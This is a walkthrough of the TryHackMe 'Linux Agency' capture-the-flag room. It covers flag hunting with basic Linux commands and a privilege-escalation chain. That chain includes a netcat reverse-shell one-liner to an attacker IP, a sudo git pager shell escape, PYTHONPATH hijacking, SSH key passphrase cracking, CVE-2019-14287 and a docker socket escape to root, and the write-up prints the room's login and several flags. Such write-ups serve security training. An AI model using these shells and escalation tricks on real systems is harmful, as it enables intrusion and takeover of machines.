13 KiB
TryHackMe-Linux Agency
First we are told to ssh into the box using the creds
username:agent47 password:640509040147
Linux Fundamentals
Mission 1 Flag
As from the ssh banner we got the flag for mission 1
Mission 2 Flag
Use the previous flag to login to mission1 user
In mission1's home directory you will find the flag for mission2 and you can the login with it to next user or in this case next mission
Mission 3 flag
Going to mission'2 home directory you will see flag.txt which holds flag for this mission
Mission 4 flag
Switch user to mission3 with the previous flag found
It seems there is no flag in the text file this time so we need to search around for the flag
Running grep -rnw /home -e 'mission4' I saw end of the flag in the same message
Opening it with vi editor I found the flag
Mission 5 flag
Switch user to mission4 with the flag found
Head over to mission's 5 home directory
And you'll find flag for the next mission
Mission 6 flag
Mission 7 flag
This was quite easy because all we have to do is ls -la
Mission 8 flag
Using the previous flag switch to mission7 user
Mission 9 flag
There was no flag in the home directory let's see if we can find anything in root directory (/)
Mission 10 flag
We only see rockyou.txt
Doing a grep for mission10 you will find your flag
Mission 11 flag
We see a bunch of directories in mission10's home directory so we have to look for mission11 string in these directories
Mission 12 flag
Reading .bashrc
Mission 13 flag
flag.txt is in home directory of mission13 but it doesn't have any permission so use chmod to change permissions
Mission 14 flag
Mission 15 flag
This is looking like stream of binary so let's hop over to cyberchef
Mission 16 flag
This representation looks like hex because of D in the string
Mission 17 flag
Here we have a flag binary but doesn't have any permissions so set execute flag on the binary
Mission 18 flag
It seems we have an ecnrypted string and which is being decrpyted so we need to run the java file to get the flag
Mission 19 flag
Here we have the same scenario but it is written in ruby language
Mission 20 flag
Again same thing we need to compile the c program and run it
Mission 21 flag
Mission 22 flag
Again the flag is hidden in .bashrc
Mission 23 flag
We get spawn into a python interactive shell
Mission 24 flag
We get a message from text file but I didn't get it until I saw /etc/hosts
Where localhost was resolving into mission24.com which tells that there is a webpage
Mission 25 flag
Here bribe is a binary file so on running
Transfer the binary to your machine for analyzing
Right in the beginning we can it's storing an evniromental variable in a variable named _s1 and it's checking if it contains the string "money" so we just have to export a variable named pocket with value money in terminal
Mission 26 flag
This tells me that there is something wrong with the PATH so let's export the PATH
Mission 27 flag
Running the strings command on the jpg file we will get our flag
Mission 28 flag
Extract the archive (gzip) file I have transfered it to my machine
Then use hexeditor to view the content in the jpg file which is acutally a gif image file
Mission 29 flag
This irb is a ruby prompt
Mission 30 flag
Vikto's Flag
viktor{b52c60124c0f8f85fe647021122b3d9a}
Privilege Escalation
What is dalia's flag?
We can see a cronjob in which script is running as user dalia
But when we try to overwrite the content of the 47.sh script it will not be executed because it is being paused with sleep 30 which wil pause the execution for 30 seconds and at the same the the same script will be overwritten as a root user and then the ownership will be changed to viktor so we need to somehow prevent the sleep command so we exploit PATH variable and replace the sleep command with anything
Here as you can see I made a sleep file in which I just added a bash command which will not spawn a shell but will overwrite the actual sleep command
Added PATH variable for that file
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.2.54.209 1234 >/tmp/f
Add a netcat reverse shell
And boom we get a shell as user dalia
What is silvio's flag?
Doing sudo -l
We can see that this user can run zip as user silvio
silvio{657b4d058c03ab9988875bc937f9c2ef}
What is reza's flag?
Running sudo -l on this user
Now we will be able to escalate our privileges to rez through git
sudo -u reza PAGER='sh -c "exec sh 0<&1"' /usr/bin/git -p help
reza{2f1901644eda75306f3142d837b80d3e}
What is jordan's flag?
Now this time we can run a python script as user jordan
On running we get an error because there is no python module named shop. What we can do is create a python module in the same directory where the script is and in it spawn a shell.
echo 'import os;os.system("/bin/bash")' > shop.py
But what is happening with SETENV is that it's setting the PYTHONPATH to default SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py which will lead us to PYTHONPATH Hijacking
What is ken's flag?
Here we can see less can be run as user ken so we can utilize to escalate our privileges
What is sean's flag?
This one is pretty easy similar to less and this is one of the most common privilege escaltion we encounter in CTF's
Then just do !/bin/sh
But we don't see any flag here. Looking at the groups for sean we see that he belongs to adm which can look on system logs
What is penelope's flag?
Switch user to penelope with the password found in the logs which is base64 enccoded p3nelope
What is maya's flag?
Since that base64 binary has an SUID so we can read any file by encoding it through base64 and then decoding it
What is robert's Passphrase?
We see ssh keys , if your faimilar with ssh keys usually when we login with id_rsa it can sometimes be protected with a passpharse so let's transfer the private key to our machine and give it to ssh2john so we can get a hash and then crack it with johntheripper
And we found the passphrase!. industryweapon
What is user.txt?
Here it says about entrypoint at localhost
We can see 2 local ports that is intersting , we already saw port 80 now lets see what service is running on port 2222
SSH is running so we can try to login as robert using the private key along with the passphrase
Checking for what robert can run as a superuser in docker environment
Since sudo version is 1.8.21 and we can see there is ! in sudoers there is a CVE for this which is CVE-2019-14287
What is root.txt?
When we try to see what is the image name for docker conatainer we get a permission denied
To overcome this we need change permisisons of docker.sock which is used to communicate with the main docker daemon (process) by default. It is the entry point for a Docker API. This socket is used by Docker CLI by default to execute docker commands. Default location for the socket is /run/docker.sock
Now if we do docker images
We can see the name so now we can mount the host file system on the docker container
Becoming root on the host machine
Since we have mounted the host file system on the docker container and we are root we can pretty much do anything , for example if I modify sudoers file it will take effect on the actual host machine so what we can do is edit the maya user's premisison to let me execute anything
